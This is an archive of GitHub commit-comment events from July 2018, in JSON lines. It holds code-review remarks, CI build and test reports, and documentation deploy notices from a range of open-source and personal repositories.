{"id":"7978610055","type":"CommitCommentEvent","actor":{"login":"carolw21"},"repo":{"name":"FBX-2018-TeamTBD/goals"},"payload":{"comment":{"id":29739380,"position":31,"line":31,"path":"app/src/main/java/com/example/cassandrakane/goalz/AddGoalActivity.java","commit_id":"122d74679761649f9440286fc1f2b768ddf35aa3","created_at":"2018-07-17T18:52:51Z","updated_at":"2018-07-17T18:52:51Z","author_association":"COLLABORATOR","body":"Never mind, I am not sure if that will work in this situation."}},"created_at":"2018-07-17T18:52:51Z"}
{"id":"7978611579","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29739384,"position":null,"line":null,"path":null,"commit_id":"cf5aea1e3f1e664a1f60dcb6ebdc78300e1e90ab","created_at":"2018-07-17T18:53:10Z","updated_at":"2018-07-17T18:53:10Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [composer.lock](https://github.com/pantheon-systems/documentation/commit/e639b8a539d131e6027227dcd81e572e28c62805/composer.lock)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/5c08715927407b6e451003864b3f89b1f8fff858/scripts/deploy-live.sh)\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/cf5aea1e3f1e664a1f60dcb6ebdc78300e1e90ab/.circleci/config.yml)\n"}},"created_at":"2018-07-17T18:53:10Z"}
{"id":"7978612477","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29739385,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-17T18:53:21Z","updated_at":"2018-07-17T18:53:21Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2321 of 2322 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-17T18:53:21Z"}
{"id":"7978613052","type":"CommitCommentEvent","actor":{"login":"FinalL"},"repo":{"name":"SlidyBat/SlidyEngine"},"payload":{"comment":{"id":29739386,"position":null,"line":null,"path":null,"commit_id":"4a55ed995b969348e6e592d66b1f72d1042abd38","created_at":"2018-07-17T18:53:27Z","updated_at":"2018-07-17T18:53:27Z","author_association":"NONE","body":"LOL DirectX 🤢 "}},"created_at":"2018-07-17T18:53:27Z"}
{"id":"7978613278","type":"CommitCommentEvent","actor":{"login":"yossiko24"},"repo":{"name":"yossiko24/yossikoren"},"payload":{"comment":{"id":29739387,"position":null,"line":null,"path":null,"commit_id":"5756a4e1eb8889b4b297beaa08c0209c8a3babcb","created_at":"2018-07-17T18:53:30Z","updated_at":"2018-07-17T18:53:30Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-17T18:53:30Z"}
{"id":"7978614087","type":"CommitCommentEvent","actor":{"login":"benwerd"},"repo":{"name":"idno/Known"},"payload":{"comment":{"id":29739389,"position":null,"line":null,"path":null,"commit_id":"6c3e2b3d762cdda49d90c0dbdfe80ca56d486e25","created_at":"2018-07-17T18:53:38Z","updated_at":"2018-07-17T18:53:38Z","author_association":"MEMBER","body":"A bunch of JS failures in certain themes. It required effort to maintain, for something that I don't believe anyone is using at this point."}},"created_at":"2018-07-17T18:53:38Z"}
{"id":"7978615104","type":"CommitCommentEvent","actor":{"login":"florianlenz"},"repo":{"name":"Bit-Nation/pangea-cli"},"payload":{"comment":{"id":29739392,"position":212,"line":148,"path":"src/cliActions.js","commit_id":"7defbba1f24dd21b0da2f9b15914dcba573a5a73","created_at":"2018-07-17T18:53:51Z","updated_at":"2018-07-17T18:53:51Z","author_association":"COLLABORATOR","body":"how will this handle wathing a file? One a promise is resolved it can't be resolved again. So you would only get the content once"}},"created_at":"2018-07-17T18:53:51Z"}
{"id":"7978615570","type":"CommitCommentEvent","actor":{"login":"benwerd"},"repo":{"name":"idno/Known"},"payload":{"comment":{"id":29739394,"position":null,"line":null,"path":null,"commit_id":"6c3e2b3d762cdda49d90c0dbdfe80ca56d486e25","created_at":"2018-07-17T18:53:56Z","updated_at":"2018-07-17T18:53:56Z","author_association":"MEMBER","body":"More specifically, `getElementById` was being passed a blank div often."}},"created_at":"2018-07-17T18:53:56Z"}
{"id":"7978618486","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29739400,"position":null,"line":null,"path":null,"commit_id":"e551a3e938c0df53889eed6378af71d1cb25e85f","created_at":"2018-07-17T18:54:31Z","updated_at":"2018-07-17T18:54:31Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |      0.1 |\n| `metadata_passing` |      2   |\n| `metadata_total`   |      2   |\n| `nodes_count`      |     59   |\n| `texts_total`      |      2   |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   +15534 |\n\n## Units\n\n| Changed                                                     | Status   |\n|:------------------------------------------------------------|:---------|\n| `./data/tlg0638/__cts__.xml`                                | New      |\n| `./data/tlg0638/tlg007/__cts__.xml`                         | New      |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml`     | New      |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2_old.xml` | New      |\n| `./data/tlg0638/__cts__.xml`                                | Passing  |\n| `./data/tlg0638/tlg007/__cts__.xml`                         | Passing  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml`     | Failing  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2_old.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4461)*\n"}},"created_at":"2018-07-17T18:54:31Z"}
{"id":"7978620074","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29739404,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-17T18:54:50Z","updated_at":"2018-07-17T18:54:50Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-17T18:54:50Z"}
{"id":"7978620519","type":"CommitCommentEvent","actor":{"login":"msgroi"},"repo":{"name":"salesforce/mt-dynamo"},"payload":{"comment":{"id":29739408,"position":19,"line":73,"path":"src/main/java/com/salesforce/dynamodbv2/mt/mappers/sharedtable/impl/QueryMapper.java","commit_id":"66090bf9b25c008fc73fa590fa6966ad6cf559be","created_at":"2018-07-17T18:54:55Z","updated_at":"2018-07-17T18:54:55Z","author_association":"CONTRIBUTOR","body":"Good simplification.  Thx."}},"created_at":"2018-07-17T18:54:55Z"}
{"id":"7978624031","type":"CommitCommentEvent","actor":{"login":"msgroi"},"repo":{"name":"salesforce/mt-dynamo"},"payload":{"comment":{"id":29739419,"position":110,"line":240,"path":"src/main/java/com/salesforce/dynamodbv2/mt/mappers/sharedtable/impl/MTAmazonDynamoDBBySharedTable.java","commit_id":"66090bf9b25c008fc73fa590fa6966ad6cf559be","created_at":"2018-07-17T18:55:37Z","updated_at":"2018-07-17T18:55:37Z","author_association":"CONTRIBUTOR","body":"Alot of work just to figure out of the key is in the projection.  Maybe at some point all of this logic can be moved elsewhere."}},"created_at":"2018-07-17T18:55:37Z"}
{"id":"7978627155","type":"CommitCommentEvent","actor":{"login":"msgroi"},"repo":{"name":"salesforce/mt-dynamo"},"payload":{"comment":{"id":29739425,"position":76,"line":314,"path":"src/main/java/com/salesforce/dynamodbv2/mt/mappers/sharedtable/impl/QueryMapper.java","commit_id":"66090bf9b25c008fc73fa590fa6966ad6cf559be","created_at":"2018-07-17T18:56:14Z","updated_at":"2018-07-17T18:56:14Z","author_association":"CONTRIBUTOR","body":"When we apply checkstyle, I think we can sweep through and hopefully remove all of the @SuppressWarnings."}},"created_at":"2018-07-17T18:56:14Z"}
{"id":"7978628952","type":"CommitCommentEvent","actor":{"login":"msgroi"},"repo":{"name":"salesforce/mt-dynamo"},"payload":{"comment":{"id":29739427,"position":98,"line":423,"path":"src/main/java/com/salesforce/dynamodbv2/mt/mappers/sharedtable/impl/QueryMapper.java","commit_id":"66090bf9b25c008fc73fa590fa6966ad6cf559be","created_at":"2018-07-17T18:56:35Z","updated_at":"2018-07-17T18:56:35Z","author_association":"CONTRIBUTOR","body":"I knew this was bad.  Thanks."}},"created_at":"2018-07-17T18:56:35Z"}
{"id":"7978634534","type":"CommitCommentEvent","actor":{"login":"busjaeger"},"repo":{"name":"salesforce/mt-dynamo"},"payload":{"comment":{"id":29739436,"position":110,"line":240,"path":"src/main/java/com/salesforce/dynamodbv2/mt/mappers/sharedtable/impl/MTAmazonDynamoDBBySharedTable.java","commit_id":"66090bf9b25c008fc73fa590fa6966ad6cf559be","created_at":"2018-07-17T18:57:39Z","updated_at":"2018-07-17T18:57:39Z","author_association":"CONTRIBUTOR","body":"Yeah, I wasn't quite sure where to put it. Would it be better to move it into the query mapper?"}},"created_at":"2018-07-17T18:57:39Z"}
{"id":"7978637340","type":"CommitCommentEvent","actor":{"login":"busjaeger"},"repo":{"name":"salesforce/mt-dynamo"},"payload":{"comment":{"id":29739444,"position":110,"line":240,"path":"src/main/java/com/salesforce/dynamodbv2/mt/mappers/sharedtable/impl/MTAmazonDynamoDBBySharedTable.java","commit_id":"66090bf9b25c008fc73fa590fa6966ad6cf559be","created_at":"2018-07-17T18:58:12Z","updated_at":"2018-07-17T18:58:12Z","author_association":"CONTRIBUTOR","body":"It's line 234 that makes this necessary btw."}},"created_at":"2018-07-17T18:58:12Z"}
{"id":"7978651686","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"kredki/StarterKitChess"},"payload":{"comment":{"id":29739476,"position":7,"line":36,"path":"ChessAlgorithms/src/main/java/com/capgemini/chess/algorithms/implementation/ValidationManager.java","commit_id":"5d9e0ea4f744367a409a470f341a21a0cc6878f7","created_at":"2018-07-17T19:00:57Z","updated_at":"2018-07-17T19:00:57Z","author_association":"NONE","body":"oddziel tworzenie Move od validacji"}},"created_at":"2018-07-17T19:00:57Z"}
{"id":"7978651794","type":"CommitCommentEvent","actor":{"login":"anyaelena"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29739479,"position":5,"line":41,"path":"server/app/controllers/admin_controller.rb","commit_id":"6c5696b7df8130f4feab2d70c080bc121391e418","created_at":"2018-07-17T19:00:58Z","updated_at":"2018-07-17T19:00:58Z","author_association":"MEMBER","body":"i was just going to suggest this!\r\n\r\nbut, did this pass Appveyor?  I think Windows needs openstudio.exe"}},"created_at":"2018-07-17T19:00:58Z"}
{"id":"7978652741","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng"},"payload":{"comment":{"id":29739481,"position":4,"line":1379,"path":"src/otrng.c","commit_id":"f81fcc8ba7ace6ef5a39bea75cd705cfddb70087","created_at":"2018-07-17T19:01:10Z","updated_at":"2018-07-17T19:01:10Z","author_association":"MEMBER","body":"We should add this to the spec as well. As right now it only defines:\r\n\r\n```\r\nERROR_4: (the instance tags do not correspond)\r\n    Malformed message\r\n```"}},"created_at":"2018-07-17T19:01:10Z"}
{"id":"7978658004","type":"CommitCommentEvent","actor":{"login":"heroqu"},"repo":{"name":"heroqu/react-i18n-site"},"payload":{"comment":{"id":29739490,"position":null,"line":null,"path":null,"commit_id":"5c9ffd0a2b50e4abebe42a5cc9501fd770925de8","created_at":"2018-07-17T19:02:13Z","updated_at":"2018-07-17T19:02:13Z","author_association":"OWNER","body":"Had to do it in two steps as GIT doesn't detect simple case changing of the dir:\r\n\r\nButtons -> buttons_tmp\r\nbuttons_tmp -> buttons\r\n\r\n"}},"created_at":"2018-07-17T19:02:13Z"}
{"id":"7978659380","type":"CommitCommentEvent","actor":{"login":"cslzchen"},"repo":{"name":"birdbrained/waterbutler"},"payload":{"comment":{"id":29739495,"position":9,"line":10,"path":"waterbutler/providers/dropbox/provider.py","commit_id":"ee94e74c8c3a134bcecab463fda104793157a34b","created_at":"2018-07-17T19:02:29Z","updated_at":"2018-07-17T19:02:29Z","author_association":"NONE","body":"I agree. That's another approach to avoid the shadowing issue. I choose the alias instead of explicit import primarily because 1) there are usually too many exceptions to import but I will double check for the Dropbox provider, and 2) sometimes exceptions under different libs happen to have the same name due to no-so-good design."}},"created_at":"2018-07-17T19:02:29Z"}
{"id":"7978668206","type":"CommitCommentEvent","actor":{"login":"Alexpux"},"repo":{"name":"Alexpux/MINGW-packages"},"payload":{"comment":{"id":29739508,"position":null,"line":null,"path":null,"commit_id":"080bc0b08cd9116f625a42cb7a569b2115289f89","created_at":"2018-07-17T19:04:20Z","updated_at":"2018-07-17T19:04:20Z","author_association":"OWNER","body":"@MSP-Greg thanks for info. Create PR please "}},"created_at":"2018-07-17T19:04:20Z"}
{"id":"7978685567","type":"CommitCommentEvent","actor":{"login":"joncham"},"repo":{"name":"Unity-Technologies/bdwgc"},"payload":{"comment":{"id":29739549,"position":null,"line":null,"path":null,"commit_id":"a8ddb045cfe203516362319715f333f97ede470d","created_at":"2018-07-17T19:07:55Z","updated_at":"2018-07-17T19:07:55Z","author_association":"MEMBER","body":"@ivmai should libatomic_ops no longer be needed?"}},"created_at":"2018-07-17T19:07:55Z"}
{"id":"7978692453","type":"CommitCommentEvent","actor":{"login":"dembasy"},"repo":{"name":"dembasy/PORTFOLIO2"},"payload":{"comment":{"id":29739559,"position":null,"line":null,"path":null,"commit_id":"592d9e317d861ff56b44b1bb84aa6beffcb3f75d","created_at":"2018-07-17T19:09:22Z","updated_at":"2018-07-17T19:09:22Z","author_association":"OWNER","body":"rajouter la position fixed au css \r\n"}},"created_at":"2018-07-17T19:09:22Z"}
{"id":"7978692473","type":"CommitCommentEvent","actor":{"login":"Neyserfranklin"},"repo":{"name":"Neyserfranklin/frank"},"payload":{"comment":{"id":29739560,"position":3,"line":3,"path":".gitignore/.gitignore","commit_id":"dc4bea7b0a2b59d0bfe71e043f579ec259a61a0e","created_at":"2018-07-17T19:09:22Z","updated_at":"2018-07-17T19:09:22Z","author_association":"OWNER","body":"[https://www.facebook.com/?stype=lo&jlou=Afd7EJgDGpEr9GL2JGDTPJqlEf8zyXanP8H6rQv7E6Gna-EvV0SuIShgOYRVGzE2cc64mETjn7f8yxgVUIRaWIUhHRjFAq93JCstaid0oPgHmQ&smuh=35090&lh=Ac8-PaNZ-RxCrahO](url)"}},"created_at":"2018-07-17T19:09:22Z"}
{"id":"7978692741","type":"CommitCommentEvent","actor":{"login":"lwander"},"repo":{"name":"posox/clouddriver"},"payload":{"comment":{"id":29739561,"position":13,"line":37,"path":"clouddriver-kubernetes/src/main/groovy/com/netflix/spinnaker/clouddriver/kubernetes/v2/caching/view/model/KubernetesV2Cluster.java","commit_id":"af724c1596881766f2b6c14f42cd242760541f3e","created_at":"2018-07-17T19:09:25Z","updated_at":"2018-07-17T19:09:25Z","author_association":"NONE","body":"Yup\n\nOn Tue, Jul 17, 2018, 11:51 AM Sergey Reshetnyak <notifications@github.com>\nwrote:\n\n> @lwander <https://github.com/lwander> @ethanfrogers\n> <https://github.com/ethanfrogers> kubernetesCloudProvider.getID() is ok\n> for type?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/posox/clouddriver/commit/af724c1596881766f2b6c14f42cd242760541f3e#commitcomment-29739359>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEpivXdQhimqnNig7cNoAFzd8Lm8GZ8Mks5uHjI1gaJpZM4VTK_f>\n> .\n>\n"}},"created_at":"2018-07-17T19:09:25Z"}
{"id":"7978696366","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29739572,"position":null,"line":null,"path":null,"commit_id":"feec7b22c63bd3643b2417604ee1d6c2f3d0b7a9","created_at":"2018-07-17T19:10:11Z","updated_at":"2018-07-17T19:10:11Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [composer.lock](https://github.com/pantheon-systems/documentation/commit/e639b8a539d131e6027227dcd81e572e28c62805/composer.lock)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/5c08715927407b6e451003864b3f89b1f8fff858/scripts/deploy-live.sh)\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/cf5aea1e3f1e664a1f60dcb6ebdc78300e1e90ab/.circleci/config.yml)\n"}},"created_at":"2018-07-17T19:10:11Z"}
{"id":"7978697502","type":"CommitCommentEvent","actor":{"login":"Neyserfranklin"},"repo":{"name":"Neyserfranklin/frank"},"payload":{"comment":{"id":29739577,"position":3,"line":3,"path":".gitignore/.gitignore","commit_id":"dc4bea7b0a2b59d0bfe71e043f579ec259a61a0e","created_at":"2018-07-17T19:10:23Z","updated_at":"2018-07-17T19:10:23Z","author_association":"OWNER","body":"Prohibido el ingreso a esta cuenta."}},"created_at":"2018-07-17T19:10:23Z"}
{"id":"7978698191","type":"CommitCommentEvent","actor":{"login":"RichBossVIP"},"repo":{"name":"RichBossVIP/-Fortnite-Mods"},"payload":{"comment":{"id":29739579,"position":null,"line":null,"path":null,"commit_id":"6108603e6a6f92687fe2008d84cdad199ff62e12","created_at":"2018-07-17T19:10:32Z","updated_at":"2018-07-17T19:10:32Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-17T19:10:32Z"}
{"id":"7978698534","type":"CommitCommentEvent","actor":{"login":"hramos"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29739581,"position":null,"line":null,"path":null,"commit_id":"b81c8b51fc6fe3c2dece72e3fe500e175613c5d4","created_at":"2018-07-17T19:10:36Z","updated_at":"2018-07-17T19:10:36Z","author_association":"CONTRIBUTOR","body":"0.56 was cut mid-June, long before this commit :)"}},"created_at":"2018-07-17T19:10:36Z"}
{"id":"7978700125","type":"CommitCommentEvent","actor":{"login":"Bhuwanaau"},"repo":{"name":"Bhuwanaau/HelloWorld"},"payload":{"comment":{"id":29739595,"position":null,"line":null,"path":null,"commit_id":"81e4eb76110773bc9cc48479aeb0c45b86a38352","created_at":"2018-07-17T19:10:55Z","updated_at":"2018-07-17T19:10:55Z","author_association":"OWNER","body":"its fine for now"}},"created_at":"2018-07-17T19:10:55Z"}
{"id":"7978701857","type":"CommitCommentEvent","actor":{"login":"Neyserfranklin"},"repo":{"name":"Neyserfranklin/frank"},"payload":{"comment":{"id":29739600,"position":null,"line":null,"path":null,"commit_id":"dc4bea7b0a2b59d0bfe71e043f579ec259a61a0e","created_at":"2018-07-17T19:11:16Z","updated_at":"2018-07-17T19:11:16Z","author_association":"OWNER","body":"https://www.google.com.pe/maps/place/Praxis+Comercial,+S.A.C./@-12.0469187,-77.0507391,17z/data=!4m12!1m6!3m5!1s0x9105c8b5287182a5:0xd86320c3ba100f45!2sPraxis+Comercial,+S.A.C.!8m2!3d-12.047585!4d-77.053078!3m4!1s0x9105c8b5287182a5:0xd86320c3ba100f45!8m2!3d-12.047585!4d-77.053078"}},"created_at":"2018-07-17T19:11:16Z"}
{"id":"7978701954","type":"CommitCommentEvent","actor":{"login":"venson25"},"repo":{"name":"GoogleChrome/chrome-app-samples"},"payload":{"comment":{"id":29739601,"position":null,"line":null,"path":null,"commit_id":"862499f73cfbcd96eb8cac1ba3295b715e1ee1e5","created_at":"2018-07-17T19:11:17Z","updated_at":"2018-07-17T19:11:17Z","author_association":"NONE","body":"[GCloudBackup.log](https://github.com/GoogleChrome/chrome-app-samples/files/2203016/GCloudBackup.log)\r\n@[](url)"}},"created_at":"2018-07-17T19:11:17Z"}
{"id":"7978705178","type":"CommitCommentEvent","actor":{"login":"Neverlord"},"repo":{"name":"vast-io/vast"},"payload":{"comment":{"id":29739604,"position":5,"line":88,"path":"libvast/test/mmapbuf.cpp","commit_id":"3b159c5beaeaa08695ce17a288e5d82171348ef0","created_at":"2018-07-17T19:11:59Z","updated_at":"2018-07-17T19:11:59Z","author_association":"MEMBER","body":"@tobim we always put a comment on the end-of-namespace line. Otherwise, a stray `}` in the code can be confusing if you don't see the opening namespace right away since we don't indent namespaces."}},"created_at":"2018-07-17T19:11:59Z"}
{"id":"7978708177","type":"CommitCommentEvent","actor":{"login":"Und3rf10w"},"repo":{"name":"hashview/hashview"},"payload":{"comment":{"id":29739610,"position":5,"line":165,"path":"views/assign_hashfile.haml","commit_id":"c302fc65746d890ba7d51eb69b5e3eec4297f7c0","created_at":"2018-07-17T19:12:32Z","updated_at":"2018-07-17T19:12:32Z","author_association":"NONE","body":"This might actually be a sign of a bigger problem? Originally, I had this as `- if !@pcaps.empty?` but kept getting the error `Haml::TempleEngine: Option :outvar is invalid `\r\n\r\nShould revisit this."}},"created_at":"2018-07-17T19:12:32Z"}
{"id":"7978710761","type":"CommitCommentEvent","actor":{"login":"ajiteshsinha"},"repo":{"name":"ajiteshsinha/EurekaClient2"},"payload":{"comment":{"id":29739615,"position":null,"line":null,"path":null,"commit_id":"b7d7524fbad0d5dbd135542a60a068af2772dde3","created_at":"2018-07-17T19:13:04Z","updated_at":"2018-07-17T19:13:04Z","author_association":"OWNER","body":"ADDED DESCRIPTION OF PROJECT"}},"created_at":"2018-07-17T19:13:04Z"}
{"id":"7978717700","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29739635,"position":null,"line":null,"path":null,"commit_id":"35c55ad301f5e29420105abf109249de413f1d4a","created_at":"2018-07-17T19:14:30Z","updated_at":"2018-07-17T19:14:30Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3857prefer](https://3857prefer-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/guides/drupal-8-composer-no-ci](https://3857prefer-static-docs.pantheonsite.io/docs/guides/drupal-8-composer-no-ci)\n"}},"created_at":"2018-07-17T19:14:30Z"}
{"id":"7978719159","type":"CommitCommentEvent","actor":{"login":"sijie"},"repo":{"name":"apache/bookkeeper"},"payload":{"comment":{"id":29739638,"position":7,"line":261,"path":"bookkeeper-server/src/main/java/org/apache/bookkeeper/proto/BookieServer.java","commit_id":"d7867d94b3bf108e8f986b5abafa6980ddec0feb","created_at":"2018-07-17T19:14:49Z","updated_at":"2018-07-17T19:14:49Z","author_association":"CONTRIBUTOR","body":"will do."}},"created_at":"2018-07-17T19:14:49Z"}
{"id":"7978724110","type":"CommitCommentEvent","actor":{"login":"sijie"},"repo":{"name":"apache/bookkeeper"},"payload":{"comment":{"id":29739650,"position":8,"line":262,"path":"bookkeeper-server/src/main/java/org/apache/bookkeeper/proto/BookieServer.java","commit_id":"d7867d94b3bf108e8f986b5abafa6980ddec0feb","created_at":"2018-07-17T19:15:48Z","updated_at":"2018-07-17T19:15:48Z","author_association":"CONTRIBUTOR","body":"how about moving this logging before shutdown and make it look like:\r\n\r\nlog.error(\"BookieDeathWatcher exited loop due to uncaught exception\", cause)"}},"created_at":"2018-07-17T19:15:48Z"}
{"id":"7978727733","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"ziglang/zig"},"payload":{"comment":{"id":29739662,"position":93,"line":6289,"path":"src/analyze.cpp","commit_id":"e9a03cccf375f11aa4e0a8a3515e499c88d05cde","created_at":"2018-07-17T19:16:32Z","updated_at":"2018-07-17T19:16:32Z","author_association":"MEMBER","body":"Indeed, you can bet your bottom dollar the self hosted version will use `std.fmt.parseUnsigned` and handle the error code!"}},"created_at":"2018-07-17T19:16:32Z"}
{"id":"7978728132","type":"CommitCommentEvent","actor":{"login":"hyosangs"},"repo":{"name":"hyosangs/TartanAdventure-master-2team"},"payload":{"comment":{"id":29739663,"position":null,"line":null,"path":null,"commit_id":"da4a10387a092d57cf629545e130bb7e064a7ef2","created_at":"2018-07-17T19:16:37Z","updated_at":"2018-07-17T19:16:37Z","author_association":"OWNER","body":"Fixed. Thank you"}},"created_at":"2018-07-17T19:16:37Z"}
{"id":"7978732829","type":"CommitCommentEvent","actor":{"login":"prashant9912"},"repo":{"name":"prashant9912/Python-Web-Scraper"},"payload":{"comment":{"id":29739670,"position":null,"line":null,"path":null,"commit_id":"36e4262412c3cae8e4cfeb0e0fc0da9adf3f5190","created_at":"2018-07-17T19:17:39Z","updated_at":"2018-07-17T19:17:39Z","author_association":"OWNER","body":"yes"}},"created_at":"2018-07-17T19:17:39Z"}
{"id":"7978733887","type":"CommitCommentEvent","actor":{"login":"bdw"},"repo":{"name":"MoarVM/MoarVM"},"payload":{"comment":{"id":29739674,"position":44,"line":282,"path":"src/6model/reprs/MVMContext.c","commit_id":"7e3ef550d8be96e0fa62490df068312a8555fc94","created_at":"2018-07-17T19:17:52Z","updated_at":"2018-07-17T19:17:52Z","author_association":"CONTRIBUTOR","body":"Use MVM_VECTOR_PUSH here"}},"created_at":"2018-07-17T19:17:52Z"}
{"id":"7978739018","type":"CommitCommentEvent","actor":{"login":"hignz"},"repo":{"name":"joeyTT1998/TTD-notifier"},"payload":{"comment":{"id":29739687,"position":null,"line":null,"path":null,"commit_id":"96a53a64d203989948b5667325ba52c597587d27","created_at":"2018-07-17T19:18:59Z","updated_at":"2018-07-17T19:18:59Z","author_association":"CONTRIBUTOR","body":"1.06 shows as 1.6 in Chromes extension manager "}},"created_at":"2018-07-17T19:18:59Z"}
{"id":"7978740112","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29739693,"position":null,"line":null,"path":null,"commit_id":"3380a0e65e016f74058c00437c8e79d34493f3fa","created_at":"2018-07-17T19:19:14Z","updated_at":"2018-07-17T19:19:14Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |      0.1 |\n| `metadata_passing` |      2   |\n| `metadata_total`   |      2   |\n| `nodes_count`      |     59   |\n| `texts_passing`    |      1   |\n| `texts_total`      |      2   |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   +15534 |\n\n## Units\n\n| Changed                                                     | Status   |\n|:------------------------------------------------------------|:---------|\n| `./data/tlg0638/__cts__.xml`                                | New      |\n| `./data/tlg0638/tlg007/__cts__.xml`                         | New      |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml`     | New      |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2_old.xml` | New      |\n| `./data/tlg0638/__cts__.xml`                                | Passing  |\n| `./data/tlg0638/tlg007/__cts__.xml`                         | Passing  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml`     | Passing  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2_old.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4462)*\n"}},"created_at":"2018-07-17T19:19:14Z"}
{"id":"7978740513","type":"CommitCommentEvent","actor":{"login":"HaloGenius"},"repo":{"name":"minershive/hiveos-linux"},"payload":{"comment":{"id":29739695,"position":null,"line":null,"path":null,"commit_id":"82ccb0fce8d01d0a95641aa945ee969c2ffc9e9a","created_at":"2018-07-17T19:19:19Z","updated_at":"2018-07-17T19:19:19Z","author_association":"COLLABORATOR","body":"Main changes since v2.4.5:\r\n- optimize cn-heavy AMD\r\n- new currencies (ryo, bittube)\r\n- add algorithm cryptonight_bittube2\r\n- remove cryptonight coins (algorithm cryptonight is still available)"}},"created_at":"2018-07-17T19:19:19Z"}
{"id":"7978741880","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"Nitrokey/libnitrokey"},"payload":{"comment":{"id":29739699,"position":14,"line":120,"path":"CMakeLists.txt","commit_id":"6e3ae3175b34679cf1e84fc6dc5b9ebe6a9c0478","created_at":"2018-07-17T19:19:38Z","updated_at":"2018-07-17T19:19:38Z","author_association":"CONTRIBUTOR","body":"this won't work when you are building from generated tarball (not a git checkout). could you add fallback as it's done in nitrokey-app?"}},"created_at":"2018-07-17T19:19:38Z"}
